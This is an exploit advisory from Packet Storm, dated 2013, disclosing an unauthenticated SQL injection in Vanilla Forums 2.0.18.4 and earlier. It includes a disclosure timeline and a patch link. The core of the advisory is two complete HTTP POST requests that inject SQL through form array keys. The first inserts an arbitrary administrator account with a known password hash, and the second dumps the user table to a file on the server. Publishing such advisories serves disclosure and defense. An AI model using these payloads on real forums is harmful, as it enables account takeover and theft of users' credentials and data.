what you don't know can hurt you

Vanilla Forums 2.0.18.4 SQL Injection

Vanilla Forums 2.0.18.4 SQL Injection
Posted Apr 8, 2013
Authored by Michael Schratt

Vanilla Forums versions 2.0.18.4 and below suffer from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
MD5 | f53e706cd305c6409a130b544876093d

Vanilla Forums 2.0.18.4 SQL Injection

Change Mirror Download
Product Name:

Vanilla Forums

Vulnerable Version:

Up to vanilla-core-2-0-18-4

Tested on:

Windows Server 2003
Apache 2.4.3
PHP 5.4.7
MySQL 5.5.27

Vulnerability Overview:

SQL-Injection is possible, because$_POST arrays are not proper
sanitized.
You do not need to be authenticated.

Vulnerability Details:

To insert an arbitrary user, a sample HTTP-Post Request looks as
follows:

POST /[PATH]/vanilla/entry/signin HTTP/1.1
Host: [HOST]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101
Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: [any cookie]
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 399

Form%2FTransientKey=VQYSOG2F3D38&Form%2Fhpt=&Form%2FTarget=discussions&
Form%2FClientHour=2013-3-28+11%3A37&Form%2FEmail['admin';INSERT INTO
gdn_user
(UserID, Name, Password, HashMethod, DateInserted, Admin, Permissions)
VALUES (NULL, '1234', '$P$BayO4QrMb9wgzdjNhlUBWdQcVaMnKN0', 'Vanilla',
'2013-03-28 00:00:00', '1',
'');#]=abcd&Form%2FPassword=*&Form%2FSign_In=
Sign+In&Checkboxes%5B%5D=RememberMe

Indeed you has to take care of the proper encryption algorithm which is
currently used.

As it is not possible to get the user table displayed on the website,
you could establish an attack as follows:

POST /[PATH]/vanilla/entry/passwordrequest HTTP/1.1
Host: [HOST]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101
Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 255

Form%2FTransientKey=OJS6EB1J0KW7&Form%2Fhpt=&Form%2FEmail['ac';select *
from gdn_user into outfile '[FULL_PATH]\\vanilla\\out.txt' #]=13&
Form%2FRequest_a_new_password=Request+a+new+password

Update Link:

http://vanillaforums.org/discussion/23339/security-update-vanilla-2-0-18-7

Credits:

This vulnerability was discovered by Michael Schratt
Mail: mail @ mfs-enterprise . com
Web:
http://mfs-enterprise.com/wordpress/2013/04/05/vanilla-forums-2-0-18-sql-injection-insert-arbitrary-user-dump-usertable/
Twitter: @bl4ckw0rm

Timeline:

Mar 28, 2013 – Discovered vulnerability
Mar 28, 2013 – Contacted vanilla forums and asked for security contact
Mar 28, 2013 – Vanilla Forums responded
Mar 28, 2013 – Transfered vulnerability details
Apr 02, 2013 – Requested update
Apr 04, 2013 – Requested update
Apr 05, 2013 – Patch released
Apr 05, 2013 – Public advisory released
Login or Register to add favorites

File Archive:

September 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    14 Files
  • 2
    Sep 2nd
    19 Files
  • 3
    Sep 3rd
    9 Files
  • 4
    Sep 4th
    1 Files
  • 5
    Sep 5th
    2 Files
  • 6
    Sep 6th
    3 Files
  • 7
    Sep 7th
    12 Files
  • 8
    Sep 8th
    22 Files
  • 9
    Sep 9th
    17 Files
  • 10
    Sep 10th
    19 Files
  • 11
    Sep 11th
    3 Files
  • 12
    Sep 12th
    2 Files
  • 13
    Sep 13th
    15 Files
  • 14
    Sep 14th
    16 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    7 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close